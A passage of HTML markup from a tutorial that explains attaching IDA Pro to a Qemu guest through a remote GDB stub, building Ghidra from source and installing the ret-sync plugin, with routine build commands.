font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Power on VM </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 297px; overflow: hidden; width: 472px;"><img height="297" src="https://lh4.googleusercontent.com/qoD4EvbvunJT6kDYvHii-0-vaqlw_apAwvi4aObGr31IHefgOj7Nu084s4bFcNT6Bx2HmLafIzQzQ8d9sHLjWdAC3O7-GUc3Kv8FH6MXVMuxef4InJF-ytv51nRycEUCaJ8ppBD2EwYS9PMEIQ" style="margin-left: 0px; margin-top: 0px;" width="472" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check, that port is enabled (default port is 1234)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netstat -antp | grep 1234</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Start IDA PRO and select </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugger->Attach->Remote GDB debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Set IP-address with Qemu-KVM host and press OK.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 149px; overflow: hidden; width: 267px;"><img height="149" src="https://lh4.googleusercontent.com/4TghHBMYPt6QwrBuvflGGBjhALdXuo16ZKPCoSuqk5-oydOHvl07pmFcnDFWHvZmScblIdRK2XbOgZWnLS--LxQ-arOlvP7i_hDBKUfOzLUPaYDwOJ1pV44O5zFzxrF6G5VzdSLtiQyQ7jFzNw" style="margin-left: 0px; margin-top: 0px;" width="267" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You will be inside Qemu guest VM (hypervisor, host OS or guest OS)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="129" src="https://lh6.googleusercontent.com/_nLTnUFWzoU0jMVEv2zj2WPm1qnGUhvVcQ8MwpcrfDNaD4J25xJ80-ca6J-sxaJsD2zLvM0n4OS8LThiSS8eiRmcmr-0Q2hvxbSU_mTdFljM-0yDdDYmJT1KzTQy6dyM9cWBIrxHkPKCI0GRTQ" style="margin-left: 0px; margin-top: 0px;" width="671" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.11.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Ghidra + retsync plugin</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Good Ghidra book is “The Ghidra book. The definitive guide”</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can download compiled build of Ghidra from </span><a href="https://ghidra-sre.org/" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://ghidra-sre.org/</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and retsync from </span><a href="https://github.com/bootleg/ret-sync" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/bootleg/ret-sync</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In my case GHIDRA distr 9.1 version was built over 8 months ago, and I decided to compile it from source. </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Update: It’s funny, that I built Ghidra 11.11.2020, and 13.11.2020 NSA upload public 9.2 build to their server. Sometimes it is good, that NSA hacked all computers in the world ))</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 225px; overflow: hidden; width: 271px;"><img height="225" src="https://lh6.googleusercontent.com/mDahCyoDq5dSixEkToe3dnO7-NhWdTIFsuYY1wjFjy0jvwYUGogPPIYL71QhbaphX47_gjHCSE7mD4iAMsw4HGYC9dSAu761flOu_ssr4agAaRXHS231L1ox-Mwlww-4YdkGVeysApoenFKYhw" style="margin-left: 0px; margin-top: 0px;" width="271" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But I keep short building instructions in article. </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Full building instructions you can find at:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><a href="https://github.com/NationalSecurityAgency/ghidra/blob/master/DevGuide.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/NationalSecurityAgency/ghidra/blob/master/DevGuide.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Compile instruction:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">download Ghidra source from </span><a href="https://github.com/NationalSecurityAgency/ghidra" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/NationalSecurityAgency/ghidra</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">download and install Maven, gradle, win flex+bison (2.5.3 version. 3 version gives errors during compiling. Rename files to flex.exe and bison.exe), Visual Studio 2019 + Windows 10 SDK;</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">gradle --init-script gradle/support/fetchDependencies.gradle init</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">gradle buildGhidra</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get distributive archive from Ghidra </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">distr</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> directory and unpack them</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ghidra_9.2_DEV</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">download </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> from </span><a href="https://github.com/bootleg/ret-sync" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/bootleg/ret-sync</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can use compiled version from ret-sync\ext_ghidra\dist directory or compile it using command (you can see complete compile functions at same page):</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">cd ext_ghidra</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">gradle -PGHIDRA_INSTALL_DIR=</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">C:\Github\Ghidra\build\dist\ghidra_9.2_DEV</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In my case some error in Decompiler highlighting class was gotten. I simply commented it. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">High resolution display can be needed in additional fixes. Add to support\launch.properties string:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMARGS_WINDOWS=-Dsun.java2d.uiScale=2</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next you need create project for Ghidra. </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Launch </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Ghidra</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> using ghidraRun.bat</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Import </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> plugin: File->Install extension, press green +.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 89px; overflow: hidden; width: 508px;"><img height="89" src="https://lh4.googleusercontent.com/a2N5jXrELJs3mc5LOdBfMydcI-Yqsz7XeNJ0qBdgwZKBLkDcdx5FQWev2NDBraYVSDUNyhGIt739527C0NEQPSQdxBHFPBGP9nJA2dBCy0O2ikpOUKt6B4OiHI8CmHimd049zAjLC0FDeYotXg" style="margin-left: 0px; margin-top: 0px;" width="508" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Select zip archive with </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> plugin:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 195px; overflow: hidden; width: 490px;"><img height="195" src="https://lh6.googleusercontent.com/3Gp0xh_BYYESPdvlKIPM_zTKRS3Wa1XQ7JfpAYXQXhWLXLvcNZRdK5FWAG9EL6renDQTWphrL0pJXOU4p0L1fqbTi05AozxyOlVBTbh-n2L8lGOqrzKEx2MwqzYK3sZf_Gp3Rvu6DvtXTI8Erg" style="margin-left: 0px; margin-top: 0px;" width="490" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press Ok, restart Ghidra.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: 